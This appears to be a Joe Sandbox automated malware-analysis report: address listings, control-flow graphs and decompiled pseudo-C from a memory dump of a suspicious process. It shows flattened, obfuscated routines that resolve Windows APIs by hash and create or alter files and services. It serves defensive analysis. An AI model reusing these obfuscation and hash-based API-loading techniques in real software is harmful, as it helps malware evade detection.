                                                                                                      0x020b4fb7
                                                                                                      0x020b4fbb
                                                                                                      0x020b4fbd
                                                                                                      0x020b4fc1
                                                                                                      0x020b4fc3
                                                                                                      0x020b4fc7
                                                                                                      0x020b4fcc
                                                                                                      0x020b4fcc
                                                                                                      0x020b4fd0
                                                                                                      0x020b4fd0
                                                                                                      0x020b4fd0
                                                                                                      0x020b4fd6
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b4fdc
                                                                                                      0x020b51d6
                                                                                                      0x020b51d9
                                                                                                      0x020b51db
                                                                                                      0x020b51e3
                                                                                                      0x00000000
                                                                                                      0x020b4fe2
                                                                                                      0x020b4fe2
                                                                                                      0x020b4fe8
                                                                                                      0x020b50a8
                                                                                                      0x020b50ae
                                                                                                      0x020b5154
                                                                                                      0x020b5159
                                                                                                      0x020b515b
                                                                                                      0x020b516e
                                                                                                      0x020b5173
                                                                                                      0x020b5173
                                                                                                      0x020b5189
                                                                                                      0x020b518d
                                                                                                      0x020b518f
                                                                                                      0x020b519a
                                                                                                      0x020b51a0
                                                                                                      0x020b51a2
                                                                                                      0x020b51b5
                                                                                                      0x020b51ba
                                                                                                      0x020b51ba
                                                                                                      0x020b51c3
                                                                                                      0x00000000
                                                                                                      0x020b50b4
                                                                                                      0x020b50b4
                                                                                                      0x020b50ba
                                                                                                      0x00000000
                                                                                                      0x020b50c0
                                                                                                      0x020b50c0
                                                                                                      0x020b50c5
                                                                                                      0x020b50c7
                                                                                                      0x020b50da
                                                                                                      0x020b50df
                                                                                                      0x020b50df
                                                                                                      0x020b5102
                                                                                                      0x020b5104
                                                                                                      0x020b5106
                                                                                                      0x00000000
                                                                                                      0x020b510c
                                                                                                      0x020b510c
                                                                                                      0x020b5111
                                                                                                      0x020b5113
                                                                                                      0x020b5126
                                                                                                      0x020b512b
                                                                                                      0x020b512b
                                                                                                      0x020b5130
                                                                                                      0x020b5135
                                                                                                      0x020b5142
                                                                                                      0x020b5144
                                                                                                      0x020b5146
                                                                                                      0x020b5148
                                                                                                      0x020b514c
                                                                                                      0x00000000
                                                                                                      0x020b514c
                                                                                                      0x00000000
                                                                                                      0x020b5106
                                                                                                      0x020b50ba
                                                                                                      0x020b4fee
                                                                                                      0x020b4fee
                                                                                                      0x020b503c
                                                                                                      0x020b5041
                                                                                                      0x020b5043
                                                                                                      0x020b5056
                                                                                                      0x020b505b
                                                                                                      0x020b505b
                                                                                                      0x020b5062
                                                                                                      0x020b5069
                                                                                                      0x020b506b
                                                                                                      0x020b5083
                                                                                                      0x020b5083
                                                                                                      0x020b5090
                                                                                                      0x020b5092
                                                                                                      0x020b5099
                                                                                                      0x020b50a0
                                                                                                      0x020b4fcc
                                                                                                      0x020b4fcc
                                                                                                      0x00000000
                                                                                                      0x020b4fcc
                                                                                                      0x020b4ff0
                                                                                                      0x020b4ff6
                                                                                                      0x00000000
                                                                                                      0x020b52e4
                                                                                                      0x020b5002
                                                                                                      0x020b51c5
                                                                                                      0x020b51c5
                                                                                                      0x020b51cb
                                                                                                      0x020b4fcc
                                                                                                      0x020b4fcc
                                                                                                      0x00000000
                                                                                                      0x020b4fcc
                                                                                                      0x020b4fcc
                                                                                                      0x020b5008
                                                                                                      0x020b5008
                                                                                                      0x020b500f
                                                                                                      0x020b5022
                                                                                                      0x020b5027
                                                                                                      0x020b5027
                                                                                                      0x020b5033
                                                                                                      0x020b5035
                                                                                                      0x020b5035
                                                                                                      0x020b4fcc
                                                                                                      0x020b4fcc
                                                                                                      0x00000000
                                                                                                      0x020b4fcc
                                                                                                      0x020b4fcc
                                                                                                      0x020b5002
                                                                                                      0x020b4fee
                                                                                                      0x020b4fe8
                                                                                                      0x020b52f0
                                                                                                      0x020b52f0
                                                                                                      0x00000000
                                                                                                      0x020b52f0
                                                                                                      0x020b51ee
                                                                                                      0x020b51f4
                                                                                                      0x020b52cc
                                                                                                      0x020b52d2
                                                                                                      0x00000000
                                                                                                      0x020b52d8
                                                                                                      0x020b52d8
                                                                                                      0x00000000
                                                                                                      0x020b52d8
                                                                                                      0x020b51fa
                                                                                                      0x020b51fa
                                                                                                      0x020b5270
                                                                                                      0x020b5275
                                                                                                      0x020b5277
                                                                                                      0x020b528a
                                                                                                      0x020b528f
                                                                                                      0x020b528f
                                                                                                      0x020b5296
                                                                                                      0x020b5298
                                                                                                      0x020b529d
                                                                                                      0x020b529f
                                                                                                      0x020b52b2
                                                                                                      0x020b52b7
                                                                                                      0x020b52b7
                                                                                                      0x020b52c0
                                                                                                      0x020b52c2
                                                                                                      0x00000000
                                                                                                      0x020b51fc
                                                                                                      0x020b51fc
                                                                                                      0x020b5202
                                                                                                      0x020b522f
                                                                                                      0x020b5231
                                                                                                      0x020b5249
                                                                                                      0x020b5249
                                                                                                      0x020b5256
                                                                                                      0x020b5258
                                                                                                      0x020b525a
                                                                                                      0x020b5268
                                                                                                      0x020b4fcc
                                                                                                      0x020b4fcc
                                                                                                      0x00000000
                                                                                                      0x020b4fcc
                                                                                                      0x020b5204
                                                                                                      0x020b5204
                                                                                                      0x020b520a
                                                                                                      0x00000000
                                                                                                      0x020b520c
                                                                                                      0x020b5211
                                                                                                      0x020b5216
                                                                                                      0x020b5218
                                                                                                      0x020b521a
                                                                                                      0x020b5220
                                                                                                      0x020b4fcc
                                                                                                      0x020b4fcc
                                                                                                      0x00000000
                                                                                                      0x020b4fcc
                                                                                                      0x020b4fcc
                                                                                                      0x020b521a
                                                                                                      0x020b520a
                                                                                                      0x020b5202
                                                                                                      0x020b51fa
                                                                                                      0x00000000
                                                                                                      0x020b51f4

                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000008,00002000,?,?,020B89D1,?,3444DC2F,?,?), ref: 020B5090
                                                                                                      • OpenServiceW.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,020B89D1,?,3444DC2F,?,?), ref: 020B5256
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.257535197.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.257576055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_20b0000_RpcNs4.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeapOpenService
                                                                                                      • String ID:
                                                                                                      • API String ID: 4051131143-0
                                                                                                      • Opcode ID: ef019a803f9ae6a0832643f0682c27c3e4a1347e4aaf59436c163ed1ef803449
                                                                                                      • Instruction ID: ff1a8baa95c3d9563683f81cdb03d9f664b60a77f23e5c28b2c552219284d8b9
                                                                                                      • Opcode Fuzzy Hash: ef019a803f9ae6a0832643f0682c27c3e4a1347e4aaf59436c163ed1ef803449
                                                                                                      • Instruction Fuzzy Hash: EC711231F403158BDB77AFB4AC957EA76D6AF94344F5108B9E901EB280EA349D00AB81
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 459 20b8060-20b80df 460 20b80e2-20b80e7 459->460 461 20b80ed 460->461 462 20b81f3-20b81f8 460->462 465 20b81ab-20b81ee call 20bb510 461->465 466 20b80f3-20b80f8 461->466 463 20b81fe-20b8203 462->463 464 20b829d-20b82a5 462->464 470 20b822e-20b8265 463->470 471 20b8205-20b820a 463->471 467 20b82a7-20b82bf call 20b3e70 call 20b3dd0 464->467 468 20b82c5-20b82e9 CreateFileW 464->468 465->460 472 20b80fa-20b80ff 466->472 473 20b8176-20b817d 466->473 467->468 482 20b82eb-20b82f0 468->482 483 20b831c-20b8328 468->483 476 20b8282-20b8298 SetFileInformationByHandle 470->476 477 20b8267-20b827d call 20b3e70 call 20b3dd0 470->477 480 20b820c-20b8211 471->480 481 20b8216-20b821b 471->481 474 20b82f5-20b82fc 472->474 475 20b8105-20b810a 472->475 484 20b819a-20b81a6 473->484 485 20b817f-20b8195 call 20b3e70 call 20b3dd0 473->485 486 20b8319 474->486 487 20b82fe-20b8314 call 20b3e70 call 20b3dd0 474->487 475->481 489 20b8110-20b8124 call 20b3460 475->489 476->460 477->476 480->460 481->460 492 20b8221-20b822d 481->492 482->460 484->460 485->484 486->483 487->486 506 20b8126-20b813e call 20b3e70 call 20b3dd0 489->506 507 20b8144-20b8171 call 20b3400 489->507 506->507 507->460
                                                                                                      C-Code - Quality: 71%
                                                                                                      			E020B8060() {
                                                                                                      				short _v524;
                                                                                                      				struct _SECURITY_ATTRIBUTES* _v532;
                                                                                                      				intOrPtr _v536;
                                                                                                      				intOrPtr _v540;
                                                                                                      				intOrPtr _v544;
                                                                                                      				intOrPtr _v548;
                                                                                                      				intOrPtr _v552;
                                                                                                      				intOrPtr _v556;
                                                                                                      				intOrPtr _v560;
                                                                                                      				char _v564;
                                                                                                      				intOrPtr _v568;
                                                                                                      				char _v572;
                                                                                                      				struct _SECURITY_ATTRIBUTES* _v576;
                                                                                                      				intOrPtr _v580;
                                                                                                      				signed int _v584;
                                                                                                      				signed int _v588;
                                                                                                      				signed int _v592;
                                                                                                      				signed int _v596;
                                                                                                      				void* __ebx;
                                                                                                      				void* __ebp;
                                                                                                      				void* _t58;
                                                                                                      				void* _t64;
                                                                                                      				void* _t66;
                                                                                                      				intOrPtr _t68;
                                                                                                      				intOrPtr* _t69;
                                                                                                      				void* _t71;
                                                                                                      				intOrPtr* _t76;
                                                                                                      				void* _t78;
                                                                                                      				intOrPtr* _t79;
                                                                                                      				void* _t82;
                                                                                                      				void* _t90;
                                                                                                      				char _t95;
                                                                                                      				intOrPtr _t105;
                                                                                                      				intOrPtr* _t114;
                                                                                                      				void* _t117;
                                                                                                      				void* _t118;
                                                                                                      				void* _t119;
                                                                                                      				signed int* _t120;
                                                                                                      				void* _t122;
                                                                                                      
                                                                                                      				_t120 =  &_v596;
                                                                                                      				_v588 = 0xec1c;
                                                                                                      				_t58 = 0x37975d54;
                                                                                                      				_v588 = _v588 >> 1;
                                                                                                      				_v588 = _v588 ^ 0x0000770e;
                                                                                                      				_v584 = 0x6801;
                                                                                                      				_v584 = _v584 >> 4;
                                                                                                      				_v584 = _v584 ^ 0x00000681;
                                                                                                      				_v592 = 0x14c9;
                                                                                                      				_v592 = _v592 << 7;
                                                                                                      				_t90 = _v588;
                                                                                                      				_v592 = _v592 * 0x49;
                                                                                                      				_v592 = _v592 ^ 0x02f6a883;
                                                                                                      				_v596 = 0xb2d6;
                                                                                                      				_v596 = _v596 << 0x10;
                                                                                                      				_v596 = _v596 + 0x78e;
                                                                                                      				_t117 = 0;
                                                                                                      				_v596 = _v596 ^ 0xb2d6078e;
                                                                                                      				_t26 = _t117 + 1; // 0x1
                                                                                                      				_t119 = _t26;
                                                                                                      				goto L1;
                                                                                                      				do {
                                                                                                      					while(1) {
                                                                                                      						L1:
                                                                                                      						_t122 = _t58 - 0x972b871;
                                                                                                      						if(_t122 > 0) {
                                                                                                      							break;
                                                                                                      						}
                                                                                                      						if(_t122 == 0) {
                                                                                                      							_v580 = 0xa8c00;
                                                                                                      							_v576 = 0;
                                                                                                      							_v596 = E020BB510(_v580, _v576, 0x989680, 0);
                                                                                                      							_v592 = _t114;
                                                                                                      							_v588 = _v588 - _v596;
                                                                                                      							_t58 = 0x96d7801;
                                                                                                      							asm("sbb [esp+0x2c], ecx");
                                                                                                      							continue;
                                                                                                      						} else {
                                                                                                      							if(_t58 == 0x5b7e697) {
                                                                                                      								_t76 =  *0x20bdd8c;
                                                                                                      								if(_t76 == 0) {
                                                                                                      									_t78 = E020B3E70(0xbb51e2dc);
                                                                                                      									_t114 = 0xf40b8901;
                                                                                                      									_t76 = E020B3DD0(_t90, _t78, 0xf40b8901, _t119);
                                                                                                      									 *0x20bdd8c = _t76;
                                                                                                      								}
                                                                                                      								 *_t76( &_v572);
                                                                                                      								_t58 = 0x972b871;
                                                                                                      								continue;
                                                                                                      							} else {
                                                                                                      								if(_t58 == 0x7827784) {
                                                                                                      									_t79 =  *0x20bde38;
                                                                                                      									if(_t79 == 0) {
                                                                                                      										_t79 = E020B3DD0(_t90, E020B3E70(0xbb51e2dc), 0x76fc23ac, _t119);
                                                                                                      										 *0x20bde38 = _t79;
                                                                                                      									}
                                                                                                      									 *_t79(_t90);
                                                                                                      									L29:
                                                                                                      									return _t117;
                                                                                                      								} else {
                                                                                                      									if(_t58 != 0x96d7801) {
                                                                                                      										goto L17;
                                                                                                      									} else {
                                                                                                      										_t82 = E020B3460(0x20bda10);
                                                                                                      										_t114 =  *0x20bdf10;
                                                                                                      										_t118 = _t82;
                                                                                                      										if(_t114 == 0) {
                                                                                                      											_t114 = E020B3DD0(_t90, E020B3E70(0xe60124ba), 0xec538b3a, _t119);
                                                                                                      											 *0x20bdf10 = _t114;
                                                                                                      										}
                                                                                                      										_t105 =  *0x20be368;
                                                                                                      										 *_t114( &_v524, 0x104, _t118, _t105 + 0x220, _t105 + 0x14);
                                                                                                      										_t120 =  &(_t120[5]);
                                                                                                      										E020B3400(_t118);
                                                                                                      										_t58 = 0xabec09b;
                                                                                                      										continue;
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      						L30:
                                                                                                      					}
                                                                                                      					if(_t58 == 0xabec09b) {
                                                                                                      						if( *0x20bded8 == 0) {
                                                                                                      							_t66 = E020B3E70(0xbb51e2dc);
                                                                                                      							_t114 = 0xe04f22b3;
                                                                                                      							 *0x20bded8 = E020B3DD0(_t90, _t66, 0xe04f22b3, _t119);
                                                                                                      						}
                                                                                                      						_t64 = CreateFileW( &_v524, _v588, _v584, 0, _v592, _v596, 0); // executed
                                                                                                      						_t90 = _t64;
                                                                                                      						if(_t90 == 0xffffffff) {
                                                                                                      							goto L29;
                                                                                                      						} else {
                                                                                                      							_t58 = 0x2a665af9;
                                                                                                      							goto L1;
                                                                                                      						}
                                                                                                      					} else {
                                                                                                      						if(_t58 == 0x2a665af9) {
                                                                                                      							_t68 = _v568;
                                                                                                      							_t95 = _v572;
                                                                                                      							_v560 = _t68;
                                                                                                      							_v552 = _t68;
                                                                                                      							_v544 = _t68;
                                                                                                      							_v536 = _t68;
                                                                                                      							_t69 =  *0x20bdf00;
                                                                                                      							_v564 = _t95;
                                                                                                      							_v556 = _t95;
                                                                                                      							_v548 = _t95;
                                                                                                      							_v540 = _t95;
                                                                                                      							_v532 = 0;
                                                                                                      							if(_t69 == 0) {
                                                                                                      								_t71 = E020B3E70(0xbb51e2dc);
                                                                                                      								_t114 = 0x1dd60e41;
                                                                                                      								_t69 = E020B3DD0(_t90, _t71, 0x1dd60e41, _t119);
                                                                                                      								 *0x20bdf00 = _t69;
                                                                                                      							}
                                                                                                      							 *_t69(_t90, 0,  &_v564, 0x28); // executed
                                                                                                      							_t58 = 0x7827784;
                                                                                                      							_t117 =  !=  ? _t119 : _t117;
                                                                                                      							goto L1;
                                                                                                      						} else {
                                                                                                      							if(_t58 != 0x37975d54) {
                                                                                                      								goto L17;
                                                                                                      							} else {
                                                                                                      								_t58 = 0x5b7e697;
                                                                                                      								goto L1;
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      					goto L30;
                                                                                                      					L17:
                                                                                                      				} while (_t58 != 0x12916693);
                                                                                                      				return _t117;
                                                                                                      				goto L30;
                                                                                                      			}










































                                                                                                      0x020b8060
                                                                                                      0x020b8066
                                                                                                      0x020b806e
                                                                                                      0x020b8073
                                                                                                      0x020b8077
                                                                                                      0x020b807f
                                                                                                      0x020b8087
                                                                                                      0x020b808c
                                                                                                      0x020b8094
                                                                                                      0x020b80a3
                                                                                                      0x020b80ad
                                                                                                      0x020b80b3
                                                                                                      0x020b80b7
                                                                                                      0x020b80bf
                                                                                                      0x020b80c7
                                                                                                      0x020b80cc
                                                                                                      0x020b80d5
                                                                                                      0x020b80d7
                                                                                                      0x020b80df
                                                                                                      0x020b80df
                                                                                                      0x020b80df
                                                                                                      0x020b80e2
                                                                                                      0x020b80e2
                                                                                                      0x020b80e2
                                                                                                      0x020b80e2
                                                                                                      0x020b80e7
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b80ed
                                                                                                      0x020b81ad
                                                                                                      0x020b81b5
                                                                                                      0x020b81d1
                                                                                                      0x020b81d5
                                                                                                      0x020b81e1
                                                                                                      0x020b81e5
                                                                                                      0x020b81ea
                                                                                                      0x00000000
                                                                                                      0x020b80f3
                                                                                                      0x020b80f8
                                                                                                      0x020b8176
                                                                                                      0x020b817d
                                                                                                      0x020b8184
                                                                                                      0x020b8189
                                                                                                      0x020b8190
                                                                                                      0x020b8195
                                                                                                      0x020b8195
                                                                                                      0x020b819f
                                                                                                      0x020b81a1
                                                                                                      0x00000000
                                                                                                      0x020b80fa
                                                                                                      0x020b80ff
                                                                                                      0x020b82f5
                                                                                                      0x020b82fc
                                                                                                      0x020b830f
                                                                                                      0x020b8314
                                                                                                      0x020b8314
                                                                                                      0x020b831a
                                                                                                      0x020b831c
                                                                                                      0x020b8328
                                                                                                      0x020b8105
                                                                                                      0x020b810a
                                                                                                      0x00000000
                                                                                                      0x020b8110
                                                                                                      0x020b8115
                                                                                                      0x020b811a
                                                                                                      0x020b8120
                                                                                                      0x020b8124
                                                                                                      0x020b813c
                                                                                                      0x020b813e
                                                                                                      0x020b813e
                                                                                                      0x020b8144
                                                                                                      0x020b8160
                                                                                                      0x020b8162
                                                                                                      0x020b8167
                                                                                                      0x020b816c
                                                                                                      0x00000000
                                                                                                      0x020b816c
                                                                                                      0x020b810a
                                                                                                      0x020b80ff
                                                                                                      0x020b80f8
                                                                                                      0x00000000
                                                                                                      0x020b80ed
                                                                                                      0x020b81f8
                                                                                                      0x020b82a5
                                                                                                      0x020b82ac
                                                                                                      0x020b82b1
                                                                                                      0x020b82bf
                                                                                                      0x020b82bf
                                                                                                      0x020b82e2
                                                                                                      0x020b82e4
                                                                                                      0x020b82e9
                                                                                                      0x00000000
                                                                                                      0x020b82eb
                                                                                                      0x020b82eb
                                                                                                      0x00000000
                                                                                                      0x020b82eb
                                                                                                      0x020b81fe
                                                                                                      0x020b8203
                                                                                                      0x020b822e
                                                                                                      0x020b8232
                                                                                                      0x020b8236
                                                                                                      0x020b823a
                                                                                                      0x020b823e
                                                                                                      0x020b8242
                                                                                                      0x020b8246
                                                                                                      0x020b824b
                                                                                                      0x020b824f
                                                                                                      0x020b8253
                                                                                                      0x020b8257
                                                                                                      0x020b825b
                                                                                                      0x020b8265
                                                                                                      0x020b826c
                                                                                                      0x020b8271
                                                                                                      0x020b8278
                                                                                                      0x020b827d
                                                                                                      0x020b827d
                                                                                                      0x020b828c
                                                                                                      0x020b8290
                                                                                                      0x020b8295
                                                                                                      0x00000000
                                                                                                      0x020b8205
                                                                                                      0x020b820a
                                                                                                      0x00000000
                                                                                                      0x020b820c
                                                                                                      0x020b820c
                                                                                                      0x00000000
                                                                                                      0x020b820c
                                                                                                      0x020b820a
                                                                                                      0x020b8203
                                                                                                      0x00000000
                                                                                                      0x020b8216
                                                                                                      0x020b8216
                                                                                                      0x020b822d
                                                                                                      0x00000000

                                                                                                      APIs
                                                                                                      • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 020B828C
                                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,B2D6078E,00000000,?,3444DC2F,?,?), ref: 020B82E2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.257535197.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.257576055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_20b0000_RpcNs4.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: File$CreateHandleInformation
                                                                                                      • String ID:
                                                                                                      • API String ID: 3667790775-0
                                                                                                      • Opcode ID: bcdac505a12a90ebf0a2b67232ffdcb26f5614628ed32f12c15d284c166f8457
                                                                                                      • Instruction ID: b3f415d2c506a517889080096377524c5ee0bfafa57c3ccc1cf704d40eacb853
                                                                                                      • Opcode Fuzzy Hash: bcdac505a12a90ebf0a2b67232ffdcb26f5614628ed32f12c15d284c166f8457
                                                                                                      • Instruction Fuzzy Hash: CA617971A083009BD36ADF68C4846AFB7E9BFC8358F10896DF159D7250DB79D8449B42
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 517 20b5c10-20b5c1c call 20b64f0 520 20b5c39-20b5c3d ExitProcess 517->520 521 20b5c1e-20b5c34 call 20b3e70 call 20b3dd0 517->521 521->520
                                                                                                      C-Code - Quality: 100%
                                                                                                      			_entry_() {
                                                                                                      				void* _t5;
                                                                                                      				void* _t9;
                                                                                                      
                                                                                                      				E020B64F0();
                                                                                                      				if( *0x20bdd14 == 0) {
                                                                                                      					 *0x20bdd14 = E020B3DD0(_t5, E020B3E70(0xbb51e2dc), 0xdfd1813d, _t9);
                                                                                                      				}
                                                                                                      				ExitProcess(0);
                                                                                                      			}





                                                                                                      0x020b5c10
                                                                                                      0x020b5c1c
                                                                                                      0x020b5c34
                                                                                                      0x020b5c34
                                                                                                      0x020b5c3b

                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 020B5C3B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.257535197.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.257576055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_20b0000_RpcNs4.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 621844428-0
                                                                                                      • Opcode ID: 6309d43a2e6efbf7b216b5eb72e0c6190bab05258117e9322509467461a8bb38
                                                                                                      • Instruction ID: cb1e30e31fe99da4cf7f4c9bd5d65f6dc0c26a90cf1ff01f3b50eb6fe0c8458a
                                                                                                      • Opcode Fuzzy Hash: 6309d43a2e6efbf7b216b5eb72e0c6190bab05258117e9322509467461a8bb38
                                                                                                      • Instruction Fuzzy Hash: BAD012217413094BF777AFB0A8107EA218BAFC1781F608865A455DB285DF748C116F62
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 569 20b8330-20b83a8 570 20b83b0-20b83b6 569->570 571 20b83bc 570->571 572 20b8495-20b849b 570->572 573 20b83be-20b83c4 571->573 574 20b8417-20b841e 571->574 575 20b84fd-20b8504 572->575 576 20b849d-20b84a3 572->576 581 20b83ca-20b83d0 573->581 582 20b8539-20b8581 call 20bb510 573->582 579 20b843b-20b845e 574->579 580 20b8420-20b8436 call 20b3e70 call 20b3dd0 574->580 577 20b8521-20b8534 575->577 578 20b8506-20b851c call 20b3e70 call 20b3dd0 575->578 583 20b847e-20b8484 576->583 584 20b84a5-20b84ad 576->584 577->570 578->577 604 20b847b 579->604 605 20b8460-20b8476 call 20b3e70 call 20b3dd0 579->605 580->579 588 20b83d2-20b83d8 581->588 589 20b83e5-20b83ec 581->589 586 20b848a-20b8494 582->586 609 20b8587 582->609 583->570 583->586 590 20b84af-20b84c7 call 20b3e70 call 20b3dd0 584->590 591 20b84cd-20b84f1 CreateFileW 584->591 588->583 597 20b83de-20b83e3 588->597 600 20b8409-20b8415 589->600 601 20b83ee-20b8404 call 20b3e70 call 20b3dd0 589->601 590->591 591->586 593 20b84f3-20b84f8 591->593 593->570 597->570 600->570 601->600 604->583 605->604 610 20b8589-20b858b 609->610 611 20b8591-20b859e 609->611 610->586 610->611
                                                                                                      C-Code - Quality: 66%
                                                                                                      			E020B8330(void* __ebx, void* __ebp) {
                                                                                                      				short _v524;
                                                                                                      				char _v564;
                                                                                                      				char _v572;
                                                                                                      				signed int _v576;
                                                                                                      				struct _SECURITY_ATTRIBUTES* _v584;
                                                                                                      				signed int _v588;
                                                                                                      				signed int _v592;
                                                                                                      				signed int _v596;
                                                                                                      				intOrPtr _v600;
                                                                                                      				intOrPtr _v604;
                                                                                                      				intOrPtr* _t49;
                                                                                                      				intOrPtr* _t51;
                                                                                                      				intOrPtr* _t54;
                                                                                                      				void* _t62;
                                                                                                      				intOrPtr* _t67;
                                                                                                      				void* _t69;
                                                                                                      				void* _t71;
                                                                                                      				void* _t72;
                                                                                                      				void* _t73;
                                                                                                      				void* _t74;
                                                                                                      				void* _t75;
                                                                                                      				intOrPtr _t93;
                                                                                                      				void* _t95;
                                                                                                      				void* _t96;
                                                                                                      				signed int _t97;
                                                                                                      				intOrPtr _t99;
                                                                                                      				void* _t100;
                                                                                                      				void* _t103;
                                                                                                      
                                                                                                      				_t100 = __ebp;
                                                                                                      				_t75 = __ebx;
                                                                                                      				_v588 = 0xe3c6;
                                                                                                      				_t97 = 0x15db38c2;
                                                                                                      				_v588 = _v588 * 0x2c;
                                                                                                      				_v588 = _v588 ^ 0x00272688;
                                                                                                      				_v576 = 0x6801;
                                                                                                      				_v576 = _v576 >> 4;
                                                                                                      				_v576 = _v576 ^ 0x00000681;
                                                                                                      				_t96 = _v588;
                                                                                                      				_v592 = 0x14c9;
                                                                                                      				_v592 = _v592 << 7;
                                                                                                      				_v592 = _v592 * 0x49;
                                                                                                      				_v592 = _v592 ^ 0x02f6a883;
                                                                                                      				_v596 = 0xb2d6;
                                                                                                      				_v596 = _v596 << 0x10;
                                                                                                      				_v596 = _v596 + 0x78e;
                                                                                                      				_v596 = _v596 ^ 0xb2d6078e;
                                                                                                      				goto L1;
                                                                                                      				do {
                                                                                                      					while(1) {
                                                                                                      						L1:
                                                                                                      						_t103 = _t97 - 0x1de4fdf5;
                                                                                                      						if(_t103 > 0) {
                                                                                                      							break;
                                                                                                      						}
                                                                                                      						if(_t103 == 0) {
                                                                                                      							_t51 =  *0x20be348;
                                                                                                      							__eflags = _t51;
                                                                                                      							if(_t51 == 0) {
                                                                                                      								_t73 = E020B3E70(0xbb51e2dc);
                                                                                                      								_t93 = 0xdd2e2440;
                                                                                                      								_t51 = E020B3DD0(_t75, _t73, 0xdd2e2440, _t100);
                                                                                                      								 *0x20be348 = _t51;
                                                                                                      							}
                                                                                                      							 *_t51(_t96, 0,  &_v564, 0x28);
                                                                                                      							asm("sbb esi, esi");
                                                                                                      							_t54 =  *0x20bde38;
                                                                                                      							_t97 = (_t97 & 0xdb3de512) + 0x39234310;
                                                                                                      							__eflags = _t54;
                                                                                                      							if(_t54 == 0) {
                                                                                                      								_t72 = E020B3E70(0xbb51e2dc);
                                                                                                      								_t93 = 0x76fc23ac;
                                                                                                      								_t54 = E020B3DD0(_t75, _t72, 0x76fc23ac, _t100);
                                                                                                      								 *0x20bde38 = _t54;
                                                                                                      							}
                                                                                                      							 *_t54(_t96);
                                                                                                      							goto L15;
                                                                                                      						} else {
                                                                                                      							if(_t97 == 0xb7daed6) {
                                                                                                      								_v588 = 0xa8c00;
                                                                                                      								_v584 = 0;
                                                                                                      								_v604 = E020BB510(_v588, _v584, 0x989680, 0);
                                                                                                      								_v600 = _t93;
                                                                                                      								_t95 = _v588 - _v564;
                                                                                                      								_t99 = _v604;
                                                                                                      								asm("sbb ecx, [esp+0x3c]");
                                                                                                      								__eflags = _v584 - _v600;
                                                                                                      								if(__eflags < 0) {
                                                                                                      									goto L16;
                                                                                                      								} else {
                                                                                                      									if(__eflags > 0) {
                                                                                                      										L29:
                                                                                                      										return 1;
                                                                                                      									} else {
                                                                                                      										__eflags = _t95 - _t99;
                                                                                                      										if(_t95 < _t99) {
                                                                                                      											goto L16;
                                                                                                      										} else {
                                                                                                      											goto L29;
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							} else {
                                                                                                      								if(_t97 == 0x14612822) {
                                                                                                      									_t67 =  *0x20bdd8c;
                                                                                                      									__eflags = _t67;
                                                                                                      									if(_t67 == 0) {
                                                                                                      										_t71 = E020B3E70(0xbb51e2dc);
                                                                                                      										_t93 = 0xf40b8901;
                                                                                                      										_t67 = E020B3DD0(_t75, _t71, 0xf40b8901, _t100);
                                                                                                      										 *0x20bdd8c = _t67;
                                                                                                      									}
                                                                                                      									 *_t67( &_v572);
                                                                                                      									_t97 = 0xb7daed6;
                                                                                                      									continue;
                                                                                                      								} else {
                                                                                                      									if(_t97 != 0x15db38c2) {
                                                                                                      										goto L15;
                                                                                                      									} else {
                                                                                                      										_t97 = 0x27a0a68a;
                                                                                                      										continue;
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      						L30:
                                                                                                      					}
                                                                                                      					__eflags = _t97 - 0x27a0a68a;
                                                                                                      					if(_t97 == 0x27a0a68a) {
                                                                                                      						_t49 =  *0x20be028;
                                                                                                      						__eflags = _t49;
                                                                                                      						if(_t49 == 0) {
                                                                                                      							_t74 = E020B3E70(0xbb51e2dc);
                                                                                                      							_t93 = 0x2bebef82;
                                                                                                      							_t49 = E020B3DD0(_t75, _t74, 0x2bebef82, _t100);
                                                                                                      							 *0x20be028 = _t49;
                                                                                                      						}
